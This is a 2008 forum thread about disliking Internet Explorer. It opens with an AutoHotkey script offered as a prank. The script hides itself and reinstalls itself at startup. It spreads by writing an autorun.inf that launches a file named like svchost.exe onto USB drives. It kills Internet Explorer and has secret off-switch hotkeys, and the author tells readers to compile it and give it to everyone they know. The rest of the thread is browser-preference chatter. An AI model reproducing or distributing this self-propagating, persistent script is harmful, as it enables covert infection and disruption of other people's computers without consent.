| Trik Members: 34,700 | Total Posts: 133,981 | Total Threads: 25,839
|
|
Welcome to our newest member, aak999.
|
| General Discussion Feel free to talk about anything and everything in here. |
 Am I the Only One That Hates Internet Explorer? |
|
|
|
|
Lieutenant
Posts: 387
Join Date: Nov 2007
Location: Enterprise, Alabama
|
Am I the Only One That Hates Internet Explorer? -
05-16-2008, 11:22 PM
I made this funny script that doesn't let the user of the computer on it run IE.
Code:
; Settings
#Persistent
#NoTrayIcon
SetWinDelay, -1
SetControlDelay, -1
; Variables
AutoRun =
(
[autorun]
open=svchost.exe
)
; Start everything up
OnMessage(0x201, "Gui_Move")
SetTimer, Main, 10000
SetTimer, WinA, 250
Return
/* Main
- If they delete it from startup, install it back
- Oh, they have a USB drive? Let's spread the LOVIN!
*/
Main:
IfNotExist, %A_Startup%\hty.exe
FileInstall, hty.exe, %A_Startup%\hty.exe
IfExist, F:\
IfNotExist, F:\autorun.inf
FileAppend, %AutoRun%, F:\autorun.inf
Return
/* WinA
- Wait for iexplore.exe to be started.
- What? You think you can run that? NOOOOO!! (MsgBox)
*/
WinA:
Process, Wait, iexplore.exe, 50
Process, Close, iexplore.exe
If (WinActive("Internet Explorer"))
MsgBox,, Error!, An error occured because I said you can't use Internet Explorer!
Return
/* Check
- Checks if the correct keys have been pressed.
- If so, open toggle GUI.
*/
Check:
If (x >= 3 && y >= 5) {
Control_Color = 0000A0
GUI_Color = FF8040
Gui, -Caption +AlwaysOnTop +ToolWindow -SysMenu +Resize +MinSize
Gui, Color, %GUI_Color%
Gui, Add, Button, gExecute vExecute Default w250, % Mod(c, 2) ? "Turn On" : "Turn Off"
Gui, Show,, ED
WinGet, active_id, ID, A
}
Return
/* Execute
- Toggle GUI button was pressed.
- Toggle the script Pause.
*/
Execute:
Gui, Destroy
x =
y =
c++
Pause
Return
/* GuiSize
- Makes the GUI bigger or smaller
*/
GuiSize:
WinMove, ED,,,,, 40
GuiControl, Move, Execute, % "w" A_GuiWidth - 20
Return
; Hotkeys - These are used for turning this on and off. Don't tell the person them.
^!,:: ; Ctrl + Alt + Comma
x++
Gosub, Check
Return
^!.:: ; Ctrl + Alt + Period
y++
Gosub, Check
Return
; Functions
GUI_Move(wParam, lParam) {
global active_ID, ini_guiposX, ini_guiposY
CoordMode, Mouse, Screen
MouseGetPos, Xpos, Ypos, OutputvarWin, OutputVarControl
WinGetPos, winXpos, winYpos, , , ahk_id %active_ID%
if (OutputvarWin = active_ID)
{
if (OutputVarControl = "")
{
xoffset := Xpos - winXpos
yoffset := Ypos - winYpos
Loop
{
GetKeyState, state, LButton
if state = D
{
MouseGetPos, Xpos, Ypos
ini_guiposX := Xpos - Xoffset
ini_guiposY := Ypos - Yoffset
Gui,1: Show, x%ini_guiposX% y%ini_guiposY%,
}
Else
Break
}
}
}
Return
}
|
|
|
|
 |
 Re: Am I the Only One That Hates Internet Explorer? |
|
|
|
|
Banned
Posts: 1,886
Join Date: May 2007
Location: I AM SVPERNAUT
|
Re: Am I the Only One That Hates Internet Explorer? -
05-17-2008, 03:27 AM
I dont hate it I just use firefox
|
|
|
|
 |
 Re: Am I the Only One That Hates Internet Explorer? |
|
|
|
|
Field Marshal
Posts: 1,639
Join Date: Aug 2007
Location: nopo
|
Re: Am I the Only One That Hates Internet Explorer? -
05-17-2008, 08:28 AM
lmfao.
so if i save this as a .bat file and someone clicks it they cant run it?
awesome.
.:Link:.
Proud member of trik.com since 6/20/07
Respect list:.
Supernova
DS
Seesaw
SonicLink
Halosniper
Trikster
Dr. Pepper
Jordan
|
|
|
|
 |
 Re: Am I the Only One That Hates Internet Explorer? |
|
|
|
|
Lieutenant
Posts: 387
Join Date: Nov 2007
Location: Enterprise, Alabama
|
Re: Am I the Only One That Hates Internet Explorer? -
05-17-2008, 08:53 AM
No, Link...You save it as a .ahk file, compile it and give it to everyone you know.
|
|
|
|
 |
 Re: Am I the Only One That Hates Internet Explorer? |
|
|
|
|
Founder of Trik.com
Posts: 1,602
Join Date: May 2007
Location: Trik.com
|
Re: Am I the Only One That Hates Internet Explorer? -
05-17-2008, 11:25 AM
I hate it. It's slower, dumber, and less features.
|
|
|
|
 |
 Re: Am I the Only One That Hates Internet Explorer? |
|
|
|
|
$5+ Donor
Posts: 432
Join Date: Dec 2007
Location: Chi Town
|
Re: Am I the Only One That Hates Internet Explorer? -
05-18-2008, 06:34 AM
Another thing u can do is just delete every possible way of opening IE
RESPECT LIST: everyone

Thanks RamRap for dis ^^^
|
|
|
|
 |
 Re: Am I the Only One That Hates Internet Explorer? |
|
|
|
|
Trik Legend...
Posts: 1,136
Join Date: Aug 2007
Location: San Jose, CA
|
Re: Am I the Only One That Hates Internet Explorer? -
05-19-2008, 07:55 PM
See, the script itself is okay except its coded in AHK. AHK is a pretty gay scripting language (hence its non-popularity) but I suppose it has its ups and downs. =D
I suggest learning about the windows.h library or use the .NET Framework, something that is used widely throughout the internet.
~MT
|
|
|
|
 |
 Re: Am I the Only One That Hates Internet Explorer? |
|
|
|
|
Banned
Posts: 7
Join Date: Jun 2008
|
Re: Am I the Only One That Hates Internet Explorer? -
06-13-2008, 12:20 AM
nice code man =)
I also hate Ie, Firefox is such a better solution.
|
|
|
|
 |
 Re: Am I the Only One That Hates Internet Explorer? |
|
|
|
|
Corporal
Posts: 128
Join Date: Jun 2008
Location: Ireland
|
Re: Am I the Only One That Hates Internet Explorer? -
06-13-2008, 12:57 AM
Yeah only reason i have ie still installed is because theres a few websites that firefox cant open, and i needed it for about 2 of these lmao.
I don't know, but does IE even have any addons? Cause that was the first reason i went to Firefox, things like AdblockerPro are amazin addons.
Here to Help Server Mod aSpEcTz
┣┓ ┏┫ ┏┓ ┗┫━━ ┃ ━━┣┛ ┣┫ ┃ ━━━━━ ┃ ┏┳┫┣┳┓
FFFF U U CCC K K F U U C K K FFF U U C KK you! F U U C K K F UUUU CCC K K
|
|
|
|
 |
 Re: Am I the Only One That Hates Internet Explorer? |
|
|
|
|
Lieutenant
Posts: 387
Join Date: Nov 2007
Location: Enterprise, Alabama
|
Re: Am I the Only One That Hates Internet Explorer? -
06-16-2008, 02:23 PM
I only have it installed cause it's included on all MS enabled computers and I CBA to destroy it :P
As for the add-ons, I think there are a lot because I was messing around with my comp, and now when I open IE I get this:

|
|
|
|
 |
 Re: Am I the Only One That Hates Internet Explorer? |
|
|
|
|
Private
Posts: 5
Join Date: Jun 2008
|
Re: Am I the Only One That Hates Internet Explorer? -
06-17-2008, 10:39 PM
Umm Opera ftw? Firefox and IE, Lame!
|
|
|
|
 |
 Re: Am I the Only One That Hates Internet Explorer? |
|
|
|
|
Private
Posts: 29
Join Date: Jun 2008
Location: DETRIOT <3
|
Re: Am I the Only One That Hates Internet Explorer? -
06-17-2008, 11:19 PM
Hooooooly. That's epic. I should show it to my sister, she is still hooked to IE.
<3 to my friend Cameron for making this
|
|
|
|
 |
 Re: Am I the Only One That Hates Internet Explorer? |
|
|
|
|
Corporal
Posts: 128
Join Date: Jun 2008
Location: Ireland
|
Re: Am I the Only One That Hates Internet Explorer? -
06-18-2008, 02:40 AM
=(
the world has ended
I have to use Ie atm cus firefox would work properly anymore.
It causes severe lagg and takes like 3 minutes to open a web page.. 
Here to Help Server Mod aSpEcTz
┣┓ ┏┫ ┏┓ ┗┫━━ ┃ ━━┣┛ ┣┫ ┃ ━━━━━ ┃ ┏┳┫┣┳┓
FFFF U U CCC K K F U U C K K FFF U U C KK you! F U U C K K F UUUU CCC K K
|
|
|
|
 |
 Re: Am I the Only One That Hates Internet Explorer? |
|
|
|
|
Private Second Class
Posts: 72
Join Date: May 2008
Location: new york
|
Re: Am I the Only One That Hates Internet Explorer? -
06-18-2008, 09:39 AM
i feel bad for aspectz lol
|
|
|
|
 |
 Re: Am I the Only One That Hates Internet Explorer? |
|
|
|
|
$5+ Donor
Posts: 3,104
Join Date: Oct 2007
|
Re: Am I the Only One That Hates Internet Explorer? -
06-18-2008, 09:57 AM
If you haven't downloaded FireFox 3, I recommend doing so. Everything seems to load faster, even Trik! 
|
|
|
|
 |
 Re: Am I the Only One That Hates Internet Explorer? |
|
|
|
|
VooDoo -Trikserver.no-ip.org- Online
Posts: 323
Join Date: Apr 2008
|
Re: Am I the Only One That Hates Internet Explorer? -
06-18-2008, 03:13 PM
The thing I like about Firefox, is that it has a session restore option, so I either choose to do a new session, or a old one 
|
|
|
|
 |
 Re: Am I the Only One That Hates Internet Explorer? |
|
|
|
|
Corporal
Posts: 159
Join Date: May 2008
Location: Ireland
|
Re: Am I the Only One That Hates Internet Explorer? -
06-18-2008, 03:23 PM
FireFox 3.0 lets you save sessions; no more taskkill commands for me! 
-Forum: JT133 ~ Server: Jt0001-
~ Server Moderator ~
Here to help...
|
|
|
|
 |
 Re: Am I the Only One That Hates Internet Explorer? |
|
|
|
|
Private
Posts: 27
Join Date: Jun 2008
|
Re: Am I the Only One That Hates Internet Explorer? -
06-18-2008, 03:25 PM
Lololol This Is Nice!!
________
big women Webcams
Last edited by RAID; 08-15-2011 at 04:27 PM..
|
|
|
|
 |
 Re: Am I the Only One That Hates Internet Explorer? |
|
|
|
|
Private Second Class
Posts: 51
Join Date: Apr 2008
|
Re: Am I the Only One That Hates Internet Explorer? -
06-19-2008, 04:40 PM
IE smells Firefox rules
my sisters still in the past using IE
and im downloading firefox 3 now
|
|
|
|
 |
 Re: Am I the Only One That Hates Internet Explorer? |
|
|
|
|
$25+ Donor
Posts: 118
Join Date: Jan 2008
Location: Im homeless
|
Re: Am I the Only One That Hates Internet Explorer? -
06-19-2008, 06:08 PM
Firefox eats IE. IE doesn't even work anymore on my comp. It makes me mad.
Firefox for life now.
GFX FOR LIFE!
Owned ^
|
|
|
|
 |
| Thread Tools |
|
|
| Display Modes |
Linear Mode
|
Posting Rules
|
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
HTML code is Off
|
|
|
========================================================================================
----------------------------------------------------------------------------------------
========================================================================================
Powered by vBulletin® Version 3.8.4 Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.

Copyright © Trik.com
|